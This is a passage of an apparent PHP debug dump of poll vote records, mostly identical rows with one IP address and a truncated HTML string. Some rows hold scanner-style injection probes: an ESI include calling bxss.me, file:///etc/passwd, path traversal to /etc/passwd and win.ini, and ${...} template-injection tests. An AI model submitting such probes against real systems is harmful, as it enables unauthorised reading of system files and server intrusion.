'sondage_id' => '2'
),
(int) 557 => array(
'id' => '1100',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 558 => array(
'id' => '1101',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 559 => array(
'id' => '1102',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 560 => array(
'id' => '1103',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 561 => array(
'id' => '1104',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 562 => array(
'id' => '1105',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 563 => array(
'id' => '1106',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 564 => array(
'id' => '1107',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 565 => array(
'id' => '1108',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 566 => array(
'id' => '1109',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 567 => array(
'id' => '1110',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 568 => array(
'id' => '1111',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 569 => array(
'id' => '1112',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 570 => array(
'id' => '1113',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 571 => array(
'id' => '1114',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 572 => array(
'id' => '1115',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 573 => array(
'id' => '1116',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 574 => array(
'id' => '1117',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 575 => array(
'id' => '1118',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 576 => array(
'id' => '1119',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 577 => array(
'id' => '1120',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 578 => array(
'id' => '1121',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 579 => array(
'id' => '1122',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 580 => array(
'id' => '1123',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 581 => array(
'id' => '1124',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 582 => array(
'id' => '1125',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 583 => array(
'id' => '1126',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 584 => array(
'id' => '1127',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 585 => array(
'id' => '1128',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 586 => array(
'id' => '1129',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 587 => array(
'id' => '1130',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 588 => array(
'id' => '1131',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 589 => array(
'id' => '1132',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 590 => array(
'id' => '1133',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 591 => array(
'id' => '1134',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 592 => array(
'id' => '1135',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 593 => array(
'id' => '1136',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 594 => array(
'id' => '1137',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 595 => array(
'id' => '1138',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 596 => array(
'id' => '1139',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 597 => array(
'id' => '1140',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 598 => array(
'id' => '1141',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 599 => array(
'id' => '1142',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 600 => array(
'id' => '1143',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 601 => array(
'id' => '1144',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 602 => array(
'id' => '1145',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 603 => array(
'id' => '1146',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 604 => array(
'id' => '1147',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 605 => array(
'id' => '1148',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 606 => array(
'id' => '1149',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 607 => array(
'id' => '1150',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 608 => array(
'id' => '1151',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 609 => array(
'id' => '1152',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 610 => array(
'id' => '1153',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 611 => array(
'id' => '1154',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 612 => array(
'id' => '1155',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 613 => array(
'id' => '1156',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 614 => array(
'id' => '1157',
'ip' => '45.84.137.43',
'ip1' => '<pre class=<esi:include src="http://bxss.me/rpb.png"/>',
'sondage_id' => '2'
),
(int) 615 => array(
'id' => '1158',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 616 => array(
'id' => '1159',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 617 => array(
'id' => '1160',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 618 => array(
'id' => '1161',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 619 => array(
'id' => '1162',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 620 => array(
'id' => '1163',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 621 => array(
'id' => '1164',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 622 => array(
'id' => '1165',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 623 => array(
'id' => '1166',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 624 => array(
'id' => '1167',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 625 => array(
'id' => '1168',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 626 => array(
'id' => '1169',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 627 => array(
'id' => '1170',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 628 => array(
'id' => '1171',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 629 => array(
'id' => '1172',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 630 => array(
'id' => '1173',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 631 => array(
'id' => '1174',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 632 => array(
'id' => '1175',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 633 => array(
'id' => '1176',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 634 => array(
'id' => '1177',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 635 => array(
'id' => '1178',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 636 => array(
'id' => '1179',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 637 => array(
'id' => '1180',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 638 => array(
'id' => '1181',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 639 => array(
'id' => '1182',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 640 => array(
'id' => '1183',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 641 => array(
'id' => '1184',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 642 => array(
'id' => '1185',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 643 => array(
'id' => '1186',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 644 => array(
'id' => '1187',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 645 => array(
'id' => '1188',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 646 => array(
'id' => '1189',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 647 => array(
'id' => '1190',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 648 => array(
'id' => '1191',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 649 => array(
'id' => '1192',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 650 => array(
'id' => '1193',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 651 => array(
'id' => '1194',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 652 => array(
'id' => '1195',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 653 => array(
'id' => '1196',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 654 => array(
'id' => '1197',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 655 => array(
'id' => '1198',
'ip' => 'file:///etc/passwd',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 656 => array(
'id' => '1199',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 657 => array(
'id' => '1200',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 658 => array(
'id' => '1201',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 659 => array(
'id' => '1202',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 660 => array(
'id' => '1203',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 661 => array(
'id' => '1204',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 662 => array(
'id' => '1205',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 663 => array(
'id' => '1206',
'ip' => '../45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 664 => array(
'id' => '1207',
'ip' => '45.84.137.43',
'ip1' => '../../../../../../../../../../../../../../etc/passwd',
'sondage_id' => '2'
),
(int) 665 => array(
'id' => '1208',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 666 => array(
'id' => '1209',
'ip' => '45.84.137.43',
'ip1' => '../../../../../../../../../../../../../../windows/win.ini',
'sondage_id' => '2'
),
(int) 667 => array(
'id' => '1210',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 668 => array(
'id' => '1211',
'ip' => '45.84.137.43',
'ip1' => 'file:///etc/passwd',
'sondage_id' => '2'
),
(int) 669 => array(
'id' => '1212',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 670 => array(
'id' => '1213',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 671 => array(
'id' => '1214',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 672 => array(
'id' => '1215',
'ip' => '45.84.137.43',
'ip1' => '../<pre class=',
'sondage_id' => '2'
),
(int) 673 => array(
'id' => '1216',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 674 => array(
'id' => '1217',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 675 => array(
'id' => '1218',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 676 => array(
'id' => '1219',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 677 => array(
'id' => '1220',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 678 => array(
'id' => '1221',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 679 => array(
'id' => '1222',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 680 => array(
'id' => '1223',
'ip' => '45.84.137.43',
'ip1' => '',
'sondage_id' => '2'
),
(int) 681 => array(
'id' => '1224',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 682 => array(
'id' => '1225',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 683 => array(
'id' => '1226',
'ip' => '${9999478+9999956}',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 684 => array(
'id' => '1227',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 685 => array(
'id' => '1228',
'ip' => '45.84.137.43',
'ip1' => '${9999763+9999062}',
'sondage_id' => '2'
),
(int) 686 => array(
'id' => '1229',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 687 => array(
'id' => '1230',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 688 => array(
'id' => '1231',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 689 => array(
'id' => '1232',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 690 => array(
'id' => '1233',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 691 => array(
'id' => '1234',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 692 => array(
'id' => '1235',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 693 => array(
'id' => '1236',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 694 => array(
'id' => '1237',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 695 => array(
'id' => '1238',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 696 => array(
'id' => '1239',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 697 => array(
'id' => '1240',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 698 => array(
'id' => '1241',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 699 => array(
'id' => '1242',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 700 => array(
'id' => '1243',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 701 => array(
'id' => '1244',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 702 => array(
'id' => '1245',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 703 => array(
'id' => '1246',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 704 => array(
'id' => '1247',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 705 => array(
'id' => '1248',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 706 => array(
'id' => '1249',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 707 => array(
'id' => '1250',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 708 => array(
'id' => '1251',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 709 => array(
'id' => '1252',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 710 => array(
'id' => '1253',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 711 => array(
'id' => '1254',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 712 => array(
'id' => '1255',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 713 => array(
'id' => '1256',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 714 => array(
'id' => '1257',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 715 => array(
'id' => '1258',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 716 => array(
'id' => '1259',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 717 => array(
'id' => '1260',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 718 => array(
'id' => '1261',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 719 => array(
'id' => '1262',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 720 => array(
'id' => '1263',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 721 => array(
'id' => '1264',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 722 => array(
'id' => '1265',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 723 => array(
'id' => '1266',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 724 => array(
'id' => '1267',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 725 => array(
'id' => '1268',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 726 => array(
'id' => '1269',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 727 => array(
'id' => '1270',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 728 => array(
'id' => '1271',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 729 => array(
'id' => '1272',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 730 => array(
'id' => '1273',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 731 => array(
'id' => '1274',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 732 => array(
'id' => '1275',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 733 => array(
'id' => '1276',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 734 => array(
'id' => '1277',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 735 => array(
'id' => '1278',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 736 => array(
'id' => '1279',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 737 => array(
'id' => '1280',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 738 => array(
'id' => '1281',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 739 => array(
'id' => '1282',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 740 => array(
'id' => '1283',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 741 => array(
'id' => '1284',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 742 => array(
'id' => '1285',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 743 => array(
'id' => '1286',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 744 => array(
'id' => '1287',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 745 => array(
'id' => '1288',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 746 => array(
'id' => '1289',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 747 => array(
'id' => '1290',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 748 => array(
'id' => '1291',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 749 => array(
'id' => '1292',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 750 => array(
'id' => '1293',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 751 => array(
'id' => '1294',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 752 => array(
'id' => '1295',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 753 => array(
'id' => '1296',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 754 => array(
'id' => '1297',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 755 => array(
'id' => '1298',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 756 => array(
'id' => '1299',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 757 => array(
'id' => '1300',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 758 => array(
'id' => '1301',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 759 => array(
'id' => '1302',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 760 => array(
'id' => '1303',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 761 => array(
'id' => '1304',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 762 => array(
'id' => '1305',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 763 => array(
'id' => '1306',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 764 => array(
'id' => '1307',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 765 => array(
'id' => '1308',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 766 => array(
'id' => '1309',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 767 => array(
'id' => '1310',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 768 => array(
'id' => '1311',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 769 => array(
'id' => '1312',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 770 => array(
'id' => '1313',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 771 => array(
'id' => '1314',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 772 => array(
'id' => '1315',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 773 => array(
'id' => '1316',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 774 => array(
'id' => '1317',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 775 => array(
'id' => '1318',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 776 => array(
'id' => '1319',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 777 => array(
'id' => '1320',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 778 => array(
'id' => '1321',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 779 => array(
'id' => '1322',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 780 => array(
'id' => '1323',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 781 => array(
'id' => '1324',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 782 => array(
'id' => '1325',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 783 => array(
'id' => '1326',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 784 => array(
'id' => '1327',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 785 => array(
'id' => '1328',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 786 => array(
'id' => '1329',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 787 => array(
'id' => '1330',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 788 => array(
'id' => '1331',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 789 => array(
'id' => '1332',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 790 => array(
'id' => '1333',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 791 => array(
'id' => '1334',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 792 => array(
'id' => '1335',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 793 => array(
'id' => '1336',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 794 => array(
'id' => '1337',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 795 => array(
'id' => '1338',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 796 => array(
'id' => '1339',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 797 => array(
'id' => '1340',
'ip' => '45.84.137.43',
